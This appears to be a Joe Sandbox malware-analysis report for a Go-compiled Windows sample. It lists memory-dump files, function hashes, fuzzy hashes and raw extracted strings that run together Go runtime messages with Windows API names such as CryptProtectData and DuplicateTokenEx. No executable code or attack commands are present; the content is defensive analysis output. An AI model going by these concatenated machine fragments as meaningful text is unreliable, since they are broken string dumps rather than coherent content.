Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTa$ prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UT$ span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFileTypeIdeographicMedefai$ span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UT$mSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremote I/O errorruntime: addr = runtime: base = runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*workbuf is empty spinningthreads=, p$runtime: failed mSpanList.remove span.npages=transitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len is not zero (bad use of unsafe.Pointer? try -d=checkptr)726e6e6a203535726e6e6a787374347568
API String ID: 0-107340057
Opcode ID: af4f96360ab0d9188e3153731bab0201254a303e464a928543823dbdd81aaa95
Instruction ID: 9abb5e4802f083efdbce6755e57a61f073cca5e0de8cc4ff517cacf00689436d
Opcode Fuzzy Hash: af4f96360ab0d9188e3153731bab0201254a303e464a928543823dbdd81aaa95
Instruction Fuzzy Hash: DB31B236219B84D6DB10EF21E59136EB7B4F788B84F489921EE8D0B726CF38C954D750

Function 00A7B340 Relevance: 6.5, Strings: 5, Instructions: 243COMMON

Download Yara Rule

Strings

, ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOF, xrefs: 00A7B5CF
not in stack roots range [363797880709171295166015625: unexpected return pc for CertEnumCertificatesInStoreEaster Island Standard TimeFindCloseChangeNotificationG waiting list is corruptedGetSecurityDescriptorLengthGetUserPreferredUILanguagesSetupDiClassNameF, xrefs: 00A7B5B3
), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE, xrefs: 00A7B5EF
runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningupdate during transition bytes failed with errno= to unused region of span2006-01-02T15:04:05Z07:002910383045673370361328125AUS Central Stan, xrefs: 00A7B590
markroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Bytesreflect.Value.Fieldreflect.Value, xrefs: 00A7B60A

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: not in stack roots range [363797880709171295166015625: unexpected return pc for CertEnumCertificatesInStoreEaster Island Standard TimeFindCloseChangeNotificationG waiting list is corruptedGetSecurityDescriptorLengthGetUserPreferredUILanguagesSetupDiClassNameF$), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE$, ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOF$markroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Bytesreflect.Value.Fieldreflect.Value$runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningupdate during transition bytes failed with errno= to unused region of span2006-01-02T15:04:05Z07:002910383045673370361328125AUS Central Stan
API String ID: 0-4153952665
Opcode ID: d41696d7c75841e19ebc776618438643d79b7fb28c75a8373e7790c2750e66f1
Instruction ID: d16fd3fb0702b94b541357e6140703567d0216f24cb6c997356aa7669c543837
Opcode Fuzzy Hash: d41696d7c75841e19ebc776618438643d79b7fb28c75a8373e7790c2750e66f1
Instruction Fuzzy Hash: C5B182B6718B84C6E710DF25E98079EB765F789B80F54D226DA8D43B29DF38C484CB60

Function 00A7C0C0 Relevance: 6.4, Strings: 5, Instructions: 200COMMON

Download Yara Rule

Strings

work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetDriveTypeWGunjala_Gondi, xrefs: 00A7C38E, 00A7C3EE
runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2%SystemRoot%\system32\4656612873077392578125Aleuti, xrefs: 00A7C373
nwait > work.nprocspanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Bytesreflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcda, xrefs: 00A7C412
runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p state) must be a power , xrefs: 00A7C3D3
work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32Snaps, xrefs: 00A7C3B2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetDriveTypeWGunjala_Gondi$nwait > work.nprocspanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Bytesreflect.Value.Fieldreflect.Value.Floatreflect.Value.Indexreflect.Value.IsNilreflect.Value.Sliceruntime: g0 stack [runtime: pcda$runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p state) must be a power $runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2%SystemRoot%\system32\4656612873077392578125Aleuti$work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32Snaps
API String ID: 0-2270493645
Opcode ID: f5dc298ad2b297e6c5b2a3e248bb41c94328ff98b5fa737c5a9f2a7bc88624a4
Instruction ID: eabba9ff68efd29c81cbe7084cef0b3652573a0e57a7ae8ebc1b7187180baba7
Opcode Fuzzy Hash: f5dc298ad2b297e6c5b2a3e248bb41c94328ff98b5fa737c5a9f2a7bc88624a4
Instruction Fuzzy Hash: F4917E32314B8486EB10EB25E98139E77B4F789B90F488226EB9D47766DF3DC945CB40

Function 00A89A00 Relevance: 6.4, Strings: 5, Instructions: 155COMMON

Download Yara Rule

Strings

runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2%SystemRoot%\system32\4656612, xrefs: 00A89C25
bad summary databad symbol tablecastogscanstatuscontext canceledexec: no commandgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-, xrefs: 00A89C6F
, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx1192092895507812559604644775390625: missing method AdjustTokenGroupsCertFindExtensionCryptDecodeObjectDnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetKe, xrefs: 00A89C49
runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding psync.Mutex.LocktimeBeginPeriodtraceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015, xrefs: 00A89BC7
, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFileTypeIdeographicMedefaidrinMessageBoxWMoveFileExWNandinagariNetShar, xrefs: 00A89BE5

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: , npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFileTypeIdeographicMedefaidrinMessageBoxWMoveFileExWNandinagariNetShar$, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx1192092895507812559604644775390625: missing method AdjustTokenGroupsCertFindExtensionCryptDecodeObjectDnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetKe$bad summary databad symbol tablecastogscanstatuscontext canceledexec: no commandgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-$runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding psync.Mutex.LocktimeBeginPeriodtraceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015$runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2%SystemRoot%\system32\4656612
API String ID: 0-1804927966
Opcode ID: 57ccd98477356c6bdaa011d7fe7eda54ba32cd6e567c20bd41917c38bd5c569c
Instruction ID: a6e447bc5bc22c8557bdb44348a07ac6f775dd4a377442d3ef09e2fd20a7c238
Opcode Fuzzy Hash: 57ccd98477356c6bdaa011d7fe7eda54ba32cd6e567c20bd41917c38bd5c569c
Instruction Fuzzy Hash: CE51BC72B25B8486DA10AB15E9403AEB7A0F789BD0F884122EF9C03B6ACF3CC551C750

Function 00A98EE0 Relevance: 6.4, Strings: 5, Instructions: 114COMMON

Download Yara Rule

Strings

bad g->status in readybad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not f, xrefs: 00A990BA
runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [contro, xrefs: 00A98FC5
, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark termi, xrefs: 00A9908F
, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS, xrefs: 00A98FE5, 00A9906F
, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f, xrefs: 00A99005

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: , g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark termi$, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS$, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f$bad g->status in readybad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not f$runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [contro
API String ID: 0-587447892
Opcode ID: 8e7836db202da939a7ecf7205c27628823c669b805ed9f38cb18b31210233b76
Instruction ID: 4d332190ce16a90da0d932fdf181ebf564d8811bdf353424ec8c0b8558e49a18
Opcode Fuzzy Hash: 8e7836db202da939a7ecf7205c27628823c669b805ed9f38cb18b31210233b76
Instruction Fuzzy Hash: E0514D72328B80CADB10EB24E58135EBBA4F789790F485565FF9D07B66CB38C944CB10

Function 00AB9BE0 Relevance: 6.4, Strings: 5, Instructions: 112COMMON

Download Yara Rule

Strings

types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsignal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status %, xrefs: 00AB9D45
runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunknown type kindwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt t, xrefs: 00AB9CA5
not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFind, xrefs: 00AB9CE5
base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMo, xrefs: 00AB9CC5
runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to , xrefs: 00AB9DA9

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsignal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status %$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMo$ not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFind$runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to $runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunknown type kindwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt t
API String ID: 0-3957430339
Opcode ID: d2c16cf3a0aec3e5bd6530bd35d505b9672f8e6ea84d1db230fd1dd2251b4b88
